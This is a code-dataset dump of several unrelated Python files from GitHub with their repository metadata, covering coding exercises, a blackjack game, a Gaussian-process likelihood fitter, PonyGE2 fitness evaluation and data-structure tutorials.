\"C:/Users/whl19/Documents/Code/GenebetweenPathways/Resultcombine/2-18-2021/CoexpressionSubgroup/[8]Adherens junction/\"\n # Reliffeatureselection(10,datadir,\"P2\")\n\n # os.system(\"shutdown -s -t 1\")","repo_name":"Harry-Wang12/ctBuilder","sub_path":"code/Pyscript/RevisePathway/GetRouteandCoexpression.py","file_name":"GetRouteandCoexpression.py","file_ext":"py","file_size_in_byte":10471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"41337930529","text":"# https://www.interviewcake.com/question/python3/merge-sorted-arrays\ndef merge_lists(a_list, b_list):\n a_index, b_index = 0, 0\n merged_list = []\n while a_index < len(a_list) and b_index < len(b_list):\n if a_list[a_index] < b_list[b_index]:\n merged_list.append(a_list[a_index])\n a_index += 1\n else:\n merged_list.append(b_list[b_index])\n b_index += 1\n while a_index < len(a_list):\n merged_list.append(a_list[a_index])\n a_index += 1\n while b_index < len(b_list):\n merged_list.append(b_list[b_index])\n b_index += 1\n return merged_list\n\n\nmy_list = [3, 4, 6, 10, 11, 15]\nalices_list = [1, 5, 8, 12, 14, 19]\n\n# Prints [1, 3, 4, 5, 6, 8, 10, 11, 12, 14, 15, 19]\nprint(merge_lists(my_list, alices_list))\n","repo_name":"Zedronar/algorithms-python","sub_path":"interviewcake/04. Merge Sorted Arrays.py","file_name":"04. 
Merge Sorted Arrays.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26851737059","text":"#!/usr/bin/env python\r\n# _*_ coding: utf-8 _*_\r\n\r\nfrom handler_executor import HandlerExecutor\r\n\r\n\r\nclass EnvExecutor(object):\r\n def __init__(self, handler_name, path, log):\r\n self.__handler = None\r\n self.__handler_name = handler_name\r\n self.__factory = HandlerExecutor(handler_name, path, log)\r\n self.__context = []\r\n self.__msg = ''\r\n\r\n def init(self):\r\n self.__handler = self.__factory.create_handler()\r\n if self.__handler:\r\n return True\r\n else:\r\n self.__msg = self.__factory.get_message()\r\n return False\r\n\r\n def execute(self):\r\n self.__handler.set_context(self.__context)\r\n if self.__handler.execute():\r\n return True\r\n else:\r\n self.__msg = self.__handler.get_message()\r\n return False\r\n\r\n def clear(self):\r\n if self.__handler.clear():\r\n return True\r\n else:\r\n self.__msg = self.__handler.get_message()\r\n return False\r\n\r\n def parse_conf(self, conf):\r\n self.__context = []\r\n for item in conf:\r\n param = item.get(self.__handler_name, None)\r\n if not param:\r\n continue\r\n self.__context.append(param)\r\n\r\n def get_message(self):\r\n return self.__msg\r\n","repo_name":"npczwh/Slast-AutoTest-Framework","sub_path":"scripts/env_executor.py","file_name":"env_executor.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"5698327567","text":"############### Blackjack Project #####################\n\n# Author: Alan Wong\n# Date: 13/01/2023\n\n############### Our Blackjack House Rules #####################\n\n## The deck is unlimited in size.\n## There are no jokers.\n## The Jack/Queen/King all count as 10.\n## The the Ace can count as 11 or 1.\n## Use the following list as the deck of cards:\n## cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\n## The cards in the list have equal probability of being drawn.\n## Cards are not removed from the deck as they are drawn.\n## The computer is the dealer.\n\n\nimport random\nfrom art import logo\n\n# Create a deal_card() function that uses the List below to *return* a random card.\n#11 is the Ace.\n\ndef deal_card():\n \"\"\"Returns a random card from the deck\"\"\"\n cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\n card = random.choice(cards)\n return card\n\n# Create a function called calculate_score() that takes a List of cards as input\n# and returns the score. \n \ndef calculate_score(hand):\n \"\"\"Takes a list of cards and returns the score\"\"\"\n score = sum(hand)\n # Check for a blackjack (a hand with only 2 cards: ace + 10) and return 0 \n # instead of the actual score. 0 will represent a blackjack in our game. \n if len(hand) == 2 and score == 21:\n return 0\n # Removing the 11 (Ace) inside a hand if the score is over 21 to become \n # a value of 1\n if 11 in hand and score > 21:\n hand.remove(11)\n hand.append(1)\n score -= 10\n \n return score\n\n# Hint 13: Create a function called compare() and pass in the user_score and computer_score. If the computer and user both have the same score, \n# then it's a draw. If the computer has a blackjack (0), then the user loses. If the user has a blackjack (0), then the user wins. If the user_score\n# is over 21, then the user loses. If the computer_score is over 21, then the computer loses. 
If none of the above, then the player with \n# the highest score wins.\n\ndef compare(user_score, computer_score):\n if user_score == computer_score:\n return \"It is a draw.\"\n elif computer_score == 0:\n return \"You lose. Computer has blackjack.\"\n elif user_score == 0:\n return \"You win! You have blackjack.\"\n elif user_score > 21:\n return \"You lose. Bust.\"\n elif computer_score > 21:\n return \"You win! Computer bust.\"\n elif user_score > computer_score:\n return \"You win! \"\n else: \n return \"You lose. \"\n \ndef play_blackjack(): \n # Deal the user and computer 2 cards each using deal_card() and append().\n user_cards = []\n user_cards.append(deal_card())\n user_cards.append(deal_card())\n computer_cards = []\n computer_cards.append(deal_card())\n computer_cards.append(deal_card())\n\n # Call calculate_score(). If the computer or the user has a blackjack (0) or if the user's score is over 21, then the game ends.\n game_over = False\n while game_over == False:\n # The score will need to be rechecked with every new card drawn and the checks\n # need to be repeated until the game ends.\n user_score = calculate_score(user_cards)\n computer_score = calculate_score(computer_cards)\n print(f\" Your cards: {user_cards}, current score: {user_score}\")\n print(f\" Computer's first card: {computer_cards[0]}\")\n \n if computer_score == 0 or user_score == 0 or user_score > 21:\n game_over = True\n # If the game has not ended, ask the user if they want to draw another card. If yes, then use the deal_card() function to add another card to the user_cards List. If no, then the game has ended.\n else: \n hit = input(\"Do you want to draw another card?: Type 'y' or 'n' \\n\")\n if hit == 'y':\n user_cards.append(deal_card())\n else: \n game_over = True\n \n\n # Once the user is done, it's time to let the computer draw. The computer should keep drawing cards as long as it has \n # a score less than 17.\n while computer_score != 0 and computer_score < 17:\n computer_cards.append(deal_card())\n computer_score = calculate_score(computer_cards)\n\n print(f\"Your final hand: {user_cards}, final score: {user_score}\")\n print(f\"Computer final hand: {computer_cards}, final score: {computer_score}\")\n print(compare(user_score, computer_score))\n\n# Ask the user if they want to restart the game. If they answer yes, clear the console and start a new game of \n# blackjack and show the logo from art.py.\n\nwhile (input(\"Do you want to play blackjack? 
Type 'y' or 'n' \\n\")) == 'y':\n print(logo)\n play_blackjack()\n\n\n\n","repo_name":"alantmwong/blackjack-start","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42062740262","text":"from src.tools import read_jsonline\nimport matplotlib.pyplot as plt\n\n\ndef sentence_distance_gold(dic):\n clusters = dic[\"clusters\"]\n sentences = dic[\"sentences\"]\n # print(clusters)\n pro_s = clusters[0][1][0]\n en_s = clusters[0][0][0]\n se_num = 0\n to_num = 0\n for sentence in sentences:\n for _ in sentence:\n if to_num == en_s:\n e_index = se_num\n if to_num == pro_s:\n p_index = se_num\n to_num += 1\n se_num += 1\n\n return p_index - e_index\n\n\ndef all_file_distance(path):\n file_l = read_jsonline(path)\n dic_r = {}\n method, process, problem, solution = {}, {}, {}, {}\n for i in file_l:\n r = sentence_distance_gold(i)\n sentences = sum(i[\"sentences\"], [])\n index = i[\"clusters\"][0][1][1]\n word = sentences[index]\n if word == \"solution\":\n if r in method:\n method[r] += 1\n else:\n method[r] = 1\n\n print(method)\n # method = sorted(method.items(), key=lambda item:item[1], reverse=True)\n # print(method)\n x = method.keys()\n y = method.values()\n # print(plt.style.available)\n # plt.style.use('fivethirtyeight') # bmh\n plt.figure(figsize=(200, 200))\n plt.bar(x, y, facecolor='lightskyblue', edgecolor='white', lw=2)\n x_tick = method.keys()\n plt.show()\n\n\nif __name__ == '__main__':\n path = \"/home/patsnap/PycharmProjects/webanno_preprocess/data/jsonline_data/new_training_data/merge_x4_z5_x1_z3.jsonlines\"\n all_file_distance(path)\n","repo_name":"mujizi/webanno_preprocess","sub_path":"src/statistics/sentence_distance.py","file_name":"sentence_distance.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73097553732","text":"def treesHit(right, down):\n f = open('day3input')\n forest = [line for line in f]\n\n tree_ctr = 0\n pos = 0\n for i, biome in enumerate(forest):\n if i % down == 0:\n while pos >= len(biome) - 1:\n biome = biome.strip()\n biome += biome\n\n if biome[pos] == '#':\n tree_ctr += 1\n\n pos += right\n return tree_ctr\n\n\na = treesHit(1, 1)\nb = treesHit(3, 1)\nc = treesHit(5, 1)\nd = treesHit(7, 1)\ne = treesHit(1, 2)\n# print(a)\nprint(a * b * c * d * e)\n","repo_name":"blanks-hub/MyAdventOfCode2020","sub_path":"day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1333116536","text":"# likelihood_refit.py\nimport torch\nimport torch.distributions as D\n\n# from tabulate import tabulate\n\n\n# from framework.utils import print_dict\n# import termplot as tplot\n\n# from typing import List\nfrom mercergp.eigenvalue_gen import (\n EigenvalueGenerator,\n SmoothExponentialFasshauer,\n)\nfrom mercergp.kernels import MercerKernel\nfrom ortho.basis_functions import (\n Basis,\n # OrthonormalBasis,\n smooth_exponential_basis_fasshauer,\n)\n\n# from ortho.orthopoly import OrthogonalBasisFunction, OrthogonalPolynomial\n# import matplotlib.pyplot as plt\nfrom typing import Tuple, Callable\nfrom termcolor import colored\n\ntorch.autograd.set_detect_anomaly(True)\ntorch.set_printoptions(linewidth=300)\nimport matplotlib.pyplot as plt\nfrom typing import Tuple\n\n\nclass TermGenerator:\n def __init__(\n 
self,\n input_sample: torch.Tensor,\n output_sample: torch.Tensor,\n kernel: MercerKernel,\n ):\n \"\"\"\n Stores terms used in the calculation of gradients for the likelihood.\n\n The gradient terms for the likelihood have the following structure:\n dL/dθ = 0.5 * (y'K^{-1}dK/dθK^{-1}y - tr(K^{-1}dK/dθ))\n\n Note however that since the kernel is written ΦΛΦ', and the first time\n is 1x1, we can calculate the first term as:\n 0.5 * z' δΛ/δθ\n\n where z = {(Φ'K^-1y)^2}_i, by a trace trick.\n Opening the WSM formula for the kernel inverse, we get:\n ΦK^-1y = Φ'y - Φ'Φ(Φ'Φ + Λ^-1)^-1Φ'y\n = (I - Φ'Φ(Φ'Φ + Λ^-1)^-1)Φ'y\n The terms:\n - Φ'y\n - Φ'Φ\n can be pre-computed, so that the final iteration requires\n only :\n - calculation of (Φ'Φ + Λ^-1)^{-1}\n - multiplication of Φ'Φ with that matrix\n - subtraction from the identity\n - inner product of the result with Φ'y\n\n This class offers getter methods for precalculated terms in order to\n speed up the calculation, and is constructed once on initialisation of\n the likelihood.\n \"\"\"\n self.input_sample = input_sample\n self.output_sample = output_sample\n self.kernel = kernel\n self.order = self.kernel.order\n\n # initialise\n self.phi_data = None\n self.phi_y_data = None\n self.phi_phi_data = None\n\n @property\n def phi_y(self) -> torch.Tensor:\n \"\"\"\n Returns the matrix Φ'y.\n \"\"\"\n if self.phi_y_data is None:\n self.phi_y_data = (\n self.kernel.basis(self.input_sample).T @ self.output_sample\n )\n return self.phi_y_data\n\n @property\n def phi_phi(self) -> torch.Tensor:\n \"\"\"\n Returns the matrix Φ'Φ.\n \"\"\"\n if self.phi_phi_data is None:\n self.phi_phi_data = self.phi.T @ self.phi\n return self.phi_phi_data\n\n @property\n def phi(self) -> torch.Tensor:\n if self.phi_data is None:\n self.phi_data = self.kernel.basis(self.input_sample)\n\n return self.phi_data\n\n def get_vector_term(\n self, eigenvalues: torch.Tensor, noise: torch.Tensor\n ) -> torch.Tensor:\n \"\"\"\n Returns the term:\n z = {(Φ'K^-1y)^2}_i - (Φ'K^-1Φ)_ii\n for the inverse. 
Then, z' δΛ/δθ is the gradient for the parameter.\n\n This is because tr(AD) = diag(A)'diag(D), where D is diagonal,\n as an inner product between the vectors that comprise the diagonals\n of the matrix, when D is diagonal.\n \"\"\"\n # calculate the inverse\n inverse = torch.inverse(\n self.phi_phi + noise**2 * torch.diag(1 / eigenvalues)\n )\n intermediate_term = (1 / noise**2) * (\n torch.eye(self.order) - self.phi_phi @ inverse\n )\n\n data_term = ((intermediate_term @ self.phi_y) ** 2).squeeze()\n\n trace_term = torch.diag(intermediate_term @ self.phi_phi).squeeze()\n return 0.5 * (data_term - trace_term)\n\n def get_noise_term(self, eigenvalues: torch.Tensor, noise: torch.Tensor):\n \"\"\"\n To get the noise term gradient, we use the fact that the\n \"\"\"\n inverse = torch.inverse(\n self.phi_phi + noise**2 * torch.diag(1 / eigenvalues)\n )\n intermediate_term = (1 / noise**2) * (\n torch.eye(self.input_sample.shape[0])\n - self.phi @ inverse @ self.phi.T\n )\n data_term = (\n noise\n * torch.sum(\n (intermediate_term @ self.output_sample) ** 2\n ).squeeze()\n )\n trace_term = noise * torch.trace(intermediate_term).squeeze()\n return (data_term - trace_term).squeeze()\n\n\nclass Likelihood:\n def __init__(\n self,\n order: int,\n kernel: MercerKernel,\n input_sample: torch.Tensor,\n output_sample: torch.Tensor,\n eigenvalue_generator: EigenvalueGenerator,\n param_learning_rate: float = 0.00001,\n sigma_learning_rate: float = 0.00001,\n memoise=True,\n optimisation_threshold=0.000001,\n ):\n \"\"\"\n Initialises the Likelihood class.\n\n To use this, construct an instance of a torch.optim.Optimizer;\n register the parameters that are to be optimised, and pass it when\n instantiating this class.\n\n Parameters:\n order: The bandwidth of the kernel/no. 
of basis functions.\n basis: a Basis object that allows for construction of the various\n matrices.\n input_sample: The sample of data X.\n output_sample: The (output) sample of data Y.\n mc_sample_size=10000:\n \"\"\"\n # hyperparameters\n self.order = order\n self.kernel = kernel\n self.input_sample = input_sample\n self.output_sample = output_sample\n self.eigenvalue_generator = eigenvalue_generator\n self.memoise = memoise\n\n # learning rates\n self.param_learning_rate = param_learning_rate\n self.sigma_learning_rate = sigma_learning_rate\n\n # convergence criterion\n self.epsilon = optimisation_threshold\n self.term_generator = TermGenerator(\n input_sample, output_sample, kernel\n )\n\n def fit(\n self,\n initial_noise: torch.Tensor,\n parameters: dict,\n max_iterations=30000,\n verbose=True,\n ) -> Tuple[torch.Tensor, dict]:\n \"\"\"\n Returns a dictionary containing the trained parameters.\n\n The noise parameter, as trained is equal to \"σ^2\" in the standard\n formulation of the noise variance for the Gaussian process.\n\n We do this because the parameter is never evaluated as σ.\n \"\"\"\n converged = False\n trained_noise = initial_noise.clone().detach()\n trained_parameters = parameters.copy()\n iterations = 0\n while not converged and iterations < max_iterations:\n # Get the gradients\n noise_gradient, parameters_gradients = self.get_gradients(\n trained_parameters, trained_noise\n )\n\n # update the parameters\n trained_noise.data += self.sigma_learning_rate * noise_gradient\n if verbose:\n if iterations % 500 == 0:\n print(\"Iteration: {}\".format(iterations))\n print(\"Order:\", self.order)\n print(\n \"Noise gradient:\",\n colored(noise_gradient, \"green\"),\n end=\"\",\n )\n print(\n \"Noise value\",\n colored(trained_noise.data**2, \"magenta\"),\n )\n\n # it may be better as a tensor of parameter values...\n for param in trained_parameters:\n if verbose:\n if iterations % 500 == 0:\n print(\n \"param gradient for: {}\".format(param),\n colored(parameters_gradients[param], \"blue\"),\n end=\"\",\n )\n print(\n \"param value for: {}\".format(param),\n colored(parameters[param], \"red\"),\n )\n trained_parameters[param].data += (\n self.param_learning_rate * parameters_gradients[param]\n )\n\n # having updated parameters and noise values, change on the kernel\n # self.update_kernel_parameters(trained_parameters, trained_noise)\n\n # check the criterion\n \"\"\"\n TEMPORARY SUBSTITUTION: WE WILL JUST USE NOISE AS THE CRITERION\n \"\"\"\n converged = (\n torch.abs(noise_gradient) * self.sigma_learning_rate * 100\n < self.epsilon\n )\n # converged = (torch.abs(noise_gradient) < self.epsilon) and (\n # torch.Tensor(\n # [\n # torch.abs(gradient) < self.epsilon\n # for gradient in parameters_gradients.values()\n # ]\n # )\n # ).all()\n iterations += 1\n if iterations % 500 == 0:\n print(\"Iteration: {}\".format(iterations))\n\n if converged:\n print(\"Converged!\")\n self.converged = True\n else:\n self.converged = False\n print(\"Not converged: {} iterations completed.\".format(iterations))\n final_eigenvalues = self.eigenvalue_generator(trained_parameters)\n print(\"final eigenvalues:\", final_eigenvalues)\n experiment_order = sum(\n torch.where(\n final_eigenvalues\n > (trained_noise / self.input_sample.shape[0]),\n torch.ones(final_eigenvalues.shape),\n torch.zeros(final_eigenvalues.shape),\n )\n )\n print(\"estimated optimal order:\", experiment_order)\n return trained_noise, trained_parameters\n\n def get_gradients(\n self, parameters: dict, noise: torch.Tensor\n ) -> 
Tuple[torch.Tensor, dict]:\n \"\"\"\n Returns the gradient of the log-likelihood w.r.t the noise parameter\n and the parameters tensor.\n\n Because the calculation of the kernel inverse is ostensibly expensive,\n the kernel inverse is calculated at the top of the \"computational graph\"\n and passed in to the functions that will then call the TermGenerator\n to construct respective gradient terms.\n\n output shapes:\n sigma_grad: [1]\n params_grad: [b x 1]\n \"\"\"\n eigenvalues = self.eigenvalue_generator(parameters)\n\n # get the terms\n noise_gradient = self.term_generator.get_noise_term(eigenvalues, noise)\n vector_term = self.term_generator.get_vector_term(eigenvalues, noise)\n parameters_gradients: dict = self.parameters_gradient(\n vector_term, parameters\n )\n return noise_gradient, parameters_gradients\n\n def noise_gradient(\n self,\n kernel_inverse: torch.Tensor,\n parameters: dict,\n noise: torch.Tensor,\n ) -> torch.Tensor:\n \"\"\"\n Returns the gradient of the log-likelihood w.r.t the noise parameter.\n\n Code in here will calculate the appropriate terms for the gradients\n by calling the appropriate methods in the TermGenerator class.\n\n Returns a tensor scalar containing the gradient information for\n the noise parameter.\n\n The key difference between this and the param_gradient function\n is that in there the corresponding einsum must take into account the\n extended shape of the parameters Tensor.\n\n Because the kernel inverse is common to all terms, we precompute this\n and pass it as an argument, for efficiency.\n \"\"\"\n # get the terms\n sigma_gradient_term = 2 * noise * torch.eye(self.input_sample.shape[0])\n\n data_term = 0.5 * torch.einsum(\n \"i, ij..., jk..., kl..., l ->\",\n self.output_sample, # i\n kernel_inverse, # ij\n sigma_gradient_term,\n kernel_inverse, # kl\n self.output_sample, # l\n )\n trace_term = 0.5 * torch.trace(kernel_inverse @ sigma_gradient_term)\n\n return (data_term - trace_term).squeeze() # the whole noise gradient\n\n def parameters_gradient(\n self,\n term_vector: torch.Tensor,\n parameters: dict,\n # trained_noise: torch.Tensor,\n # eigenvalues: torch.Tensor,\n ) -> dict:\n \"\"\"\n Returns the gradient of the negative log likelihood w.r.t the\n parameters.\n\n Code in here will calculate the appropriate terms for the gradients\n by calling the appropriate methods in the TermGenerator class.\n\n Returns a tensor containing the gradient information for each of the\n values in the parameter tensor.\n\n The gradient of the likelihood with respect to the parameters θ is:\n dL/dθ = 1/2 y' K^-1 dK/dθ K^-1 y - 1/2 Tr(K^-1 dK/dθ)\n\n where dK/dθ is the matrix of derivatives of the kernel with respect to\n the given parameter. 
The Mercer form of the kernel means that\n this is essentially the same as the kernel, with eigenvalues set as\n the derivative of the eigenvalues:\n dK/dθ = Φ \\hat{Λ}' Φ'\n\n where \\hat{Λ} = diag(dλ_1/dΘ, ..., dλ_n/dθ) and Φ is the matrix of\n eigenfunction evaluations.\n\n That is, generating the matrix derivative term dK/dθ is equivalent to\n evaluating the kernel with eigenvalue vectors represented by the\n derivatives of the eigenvalues with respect to the parameter.\n\n input_shape:\n kernel_inverse: [n x n]\n parameters: [b x 1]\n output:\n a dictionary, with each key in \"parameters\"\n having a corresponding value of shape [b x 1]\n which is the gradient of the eigenvalues with\n respect to that parameter.\n \"\"\"\n # parameter_gradients is a dictionary of the same keys as parameters\n parameter_gradients = parameters.copy()\n\n eigenvalue_derivatives = self.eigenvalue_generator.derivatives(\n parameters\n ) # the dictionary\n\n # For each of the parameters, take the gradient given by the eigenvalue\n # generator and get the vector of values from the term_generator.\n # Then, for each of the parameters, inner-product the term generator\n # vector\n for param in parameters:\n # get the vector of eigenvalue derivatives for this parameter\n eigenvalue_derivative_vector = eigenvalue_derivatives[param]\n parameter_gradients[param] = (\n term_vector @ eigenvalue_derivative_vector\n )\n\n return parameter_gradients\n\n\ndef optimise_explicit_gradients(\n y: torch.Tensor,\n x: torch.Tensor,\n b: torch.Tensor,\n sigma: torch.Tensor,\n objective: Callable,\n epsilon: float,\n sample_size: int,\n param_learning_rate: float = 0.0001,\n sigma_learning_rate: float = 0.0001,\n):\n \"\"\"\n Optimises the likelihood w.r.t sigma, b using explicit gradients.\n\n It does this by waiting for a criterion value to\n be less than epsilon. 
The gradients are calculated explicitly.\n The gradients are handled in functions:\n - determinant_gradients\n - inverse_kernel_gradients\n\n See their signatures and bodies for more information.\n \"\"\"\n pass\n\n # functions that currently exist:\n # [F] optimise_explicit_gradients\n # [F] determinant_gradients ->\n # gets gradients for sigma and b from the det term\n # [F] inverse_kernel_gradients ->\n # gets gradients for sigma and b from the kernel inverse term\n # [F] kernel -> returns the Gram matrix of the kernel at x, x'\n # [F] evaluate_negative_log_likelihood -> evaluates the Gaussian log\n # likelihood.\n # [F] build_ground_truth -> (input_sample, noise_distribution, true_function,\n # sample_size)\n # [F] run_experiment -> returns\n\n\ndef get_tabulated_data(\n trained_noise: torch.Tensor,\n trained_parameters: dict,\n noise_gradient: torch.Tensor,\n parameters_gradients: dict,\n):\n \"\"\"\n Given the parameters and their gradients (as well as corresponding values\n for the noise parameter), tabulates the information in a presentable way\n for the repetition in the likelihood fitting.\n \"\"\"\n data = [\n \"_\",\n *trained_parameters.values(),\n \"_\",\n *parameters_gradients.values(),\n ]\n headers_list = [\n \"Values:\",\n *trained_parameters.keys(),\n \"Gradients:\",\n *parameters_gradients.keys(),\n ]\n # data = tabulate(data, headers=headers_list, tablefmt=\"grid\")\n\n # data = parameters_gradients.copy()\n # headers = [\n # \"Values:\",\n # *trained_parameters.keys(),\n # ]\n # data2 =\n return data\n\n\nif __name__ == \"__main__\":\n plot = True\n # data setup\n sample_size = 1000\n input_sample = D.Normal(0, 4).sample((sample_size,))\n true_noise_parameter = torch.Tensor([0.3])\n print(\"check input_sample\")\n\n # generate the ground truth for the function\n def test_function(x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n The test function used in an iteration of Daskalakis, Dellaportas and\n Panos.\n \"\"\"\n return (1.5 * torch.sin(x) + 0.5 * torch.cos(4 * x) + x / 8).squeeze()\n\n output_sample = (\n test_function(input_sample)\n + D.Normal(0, true_noise_parameter).sample((sample_size,)).squeeze()\n )\n\n print(\"check output_sample\")\n\n # kernel setup\n order = 7\n eigenvalues = torch.ones(order, 1)\n parameters = {\n \"ard_parameter\": torch.Tensor([1.0]),\n \"precision_parameter\": torch.Tensor([1.0]),\n \"noise_parameter\": torch.Tensor([0.5]),\n \"variance_parameter\": torch.Tensor([1.0]),\n }\n basis_function = smooth_exponential_basis_fasshauer # the basis function\n basis = Basis(basis_function, 1, order, parameters)\n kernel = MercerKernel(order, basis, eigenvalues, parameters)\n\n eigenvalue_generator = SmoothExponentialFasshauer(order)\n\n likelihood = Likelihood(\n order,\n kernel,\n input_sample,\n output_sample,\n eigenvalue_generator,\n )\n\n if plot:\n x_axis = torch.linspace(-10, 10, 1000)\n # plot the function\n plt.plot(x_axis, test_function(x_axis), label=\"true function\")\n plt.scatter(\n input_sample.numpy(),\n output_sample.numpy(),\n label=\"sampled data\",\n color=\"black\",\n )\n plt.legend()\n plt.show()\n # initial_values for parameters:\n initial_noise = torch.Tensor([0.5])\n\n # now fit the parameters\n likelihood.fit(initial_noise, parameters)\n","repo_name":"wegreenall/mercergp","sub_path":"likelihood_refit.py","file_name":"likelihood_refit.py","file_ext":"py","file_size_in_byte":19058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"41053492613","text":"#hash tables 
are types of data structures those maps keywords to their values\n\n\n#dictionary\n\ncontacts={'john':10928,'mike':534653,'wayio':54775,'nick':73454}\nprint(contacts)\n\n\n#cascanded dictionary\n\nemployee={'classa':{'john':{'salary':54514314,'id':3,'rank':'casual'},\n 'dave':{'salary':75479,'id':3,'rank':'permanent'}\n }\n }\nprint(employee)\n\n\n#accessing keys in dictionary\n\nfor items in employee.values():\n print(items)\n\n\n#CONVERTING DICTIONARY INTO DATA FRAMES\n\n\nimport pandas as pd\ndf=pd.DataFrame(employee['classa'])#this will convert my data in tabular form\nprint(df)","repo_name":"ndurumo254/python-basic","sub_path":"hash tables.py","file_name":"hash tables.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"333327002","text":"import numpy as np\n\nfrom algorithm.parameters import params\nfrom stats.stats import stats\nfrom utilities.stats.trackers import cache, runtime_error_cache\n\n\ndef evaluate_fitness(individuals):\n \"\"\"\n Evaluate an entire population of individuals. Invalid individuals are given\n a default bad fitness. If params['CACHE'] is specified then individuals\n have their fitness stored in a dictionary called utilities.trackers.cache.\n Dictionary keys are the string of the phenotype.\n There are currently three options for use with the cache:\n 1. If params['LOOKUP_FITNESS'] is specified (default case if\n params['CACHE'] is specified), individuals which have already been\n evaluated have their previous fitness read directly from the cache,\n thus saving fitness evaluations.\n 2. If params['LOOKUP_BAD_FITNESS'] is specified, individuals which\n have already been evaluated are given a default bad fitness.\n 3. If params['MUTATE_DUPLICATES'] is specified, individuals which\n have already been evaluated are mutated to produce new unique\n individuals which have not been encountered yet by the search\n process.\n\n :param individuals: A population of individuals to be evaluated.\n :return: A population of fully evaluated individuals.\n \"\"\"\n\n results, pool = [], None\n\n if params['MULTICORE']:\n pool = params['POOL']\n\n for name, ind in enumerate(individuals):\n ind.name = name\n\n # Iterate over all individuals in the population.\n if ind.invalid:\n # Invalid individuals cannot be evaluated and are given a bad\n # default fitness.\n ind.fitness = params['FITNESS_FUNCTION'].default_fitness\n stats['invalids'] += 1\n\n else:\n eval_ind = True\n\n # Valid individuals can be evaluated.\n if params['CACHE'] and ind.phenotype in cache:\n # The individual has been encountered before in\n # the utilities.trackers.cache.\n\n if params['LOOKUP_FITNESS']:\n # Set the fitness as the previous fitness from the\n # cache.\n ind.fitness = cache[ind.phenotype]\n eval_ind = False\n\n elif params['LOOKUP_BAD_FITNESS']:\n # Give the individual a bad default fitness.\n ind.fitness = params['FITNESS_FUNCTION'].default_fitness\n eval_ind = False\n\n elif params['MUTATE_DUPLICATES']:\n # Mutate the individual to produce a new phenotype\n # which has not been encountered yet.\n while (not ind.phenotype) or ind.phenotype in cache:\n ind = params['MUTATION'](ind)\n stats['regens'] += 1\n\n # Need to overwrite the current individual in the pop.\n individuals[name] = ind\n ind.name = name\n\n if eval_ind:\n results = eval_or_append(ind, results, pool)\n\n if params['MULTICORE']:\n for result in results:\n # Execute all jobs in the pool.\n ind = result.get()\n\n # Set the 
fitness of the evaluated individual by placing the\n # evaluated individual back into the population.\n individuals[ind.name] = ind\n\n # Add the evaluated individual to the cache.\n cache[ind.phenotype] = ind.fitness\n\n # Check if individual had a runtime error.\n if ind.runtime_error:\n runtime_error_cache.append(ind.phenotype)\n\n return individuals\n\n\ndef eval_or_append(ind, results, pool):\n \"\"\"\n Evaluates an individual if sequential evaluation is being used. If\n multi-core parallel evaluation is being used, adds the individual to the\n pool to be evaluated.\n\n :param ind: An individual to be evaluated.\n :param results: A list of individuals to be evaluated by the multicore\n pool of workers.\n :param pool: A pool of workers for multicore evaluation.\n :return: The evaluated individual or the list of individuals to be\n evaluated.\n \"\"\"\n\n if params['MULTICORE']:\n # Add the individual to the pool of jobs.\n results.append(pool.apply_async(ind.evaluate, ()))\n return results\n\n else:\n # Evaluate the individual.\n ind.evaluate()\n\n # Check if individual had a runtime error.\n if ind.runtime_error:\n runtime_error_cache.append(ind.phenotype)\n\n if params['CACHE']:\n # The phenotype string of the individual does not appear\n # in the cache, it must be evaluated and added to the\n # cache.\n\n if (isinstance(ind.fitness, list) and not\n any([np.isnan(i) for i in ind.fitness])) or \\\n (not isinstance(ind.fitness, list) and not\n np.isnan(ind.fitness)):\n # All fitnesses are valid.\n cache[ind.phenotype] = ind.fitness\n","repo_name":"PonyGE/PonyGE2","sub_path":"src/fitness/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":5097,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"43"} +{"seq_id":"43083751103","text":"f = open('puzzle.txt', 'r')\nline = f.readline()\nf.close()\n\ncrubs_positions = [int(el) for el in line.split(\",\")]\nf.close()\n\nmax_pos = max(crubs_positions)\n\ntot_fuel = float('inf') # biggest number of all\npos_to_align = 0\n\nfor i in range(max_pos):\n current_tot_fuel = 0\n for el in crubs_positions:\n needed_fuel = abs(el - i)\n current_tot_fuel += needed_fuel\n if current_tot_fuel < tot_fuel:\n tot_fuel = current_tot_fuel\n pos_to_align = i\n\nprint(\"position to align is\", pos_to_align)\nprint(\"needed fuel is\", tot_fuel)\n","repo_name":"aldotele/advent_of_code","sub_path":"treachery_of_whales/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74536658050","text":"# Creating double linked list\nclass Node:\n def __init__(self, value=None):\n self.value = value\n self.next = None\n self.prev = None\n\n\nclass doubly_linked:\n def __init__(self):\n self.head = None\n self.tail = None\n\n def __iter__(self):\n node = self.head\n while node:\n yield node\n node = node.next\n\n def creation_doubly(self, nodevalue):\n node = Node(nodevalue)\n self.head = node\n self.tail = node\n return 'The double linked list has been created'\n\n def insertion(self, nodevalue, location):\n if self.head is None:\n print('the list is 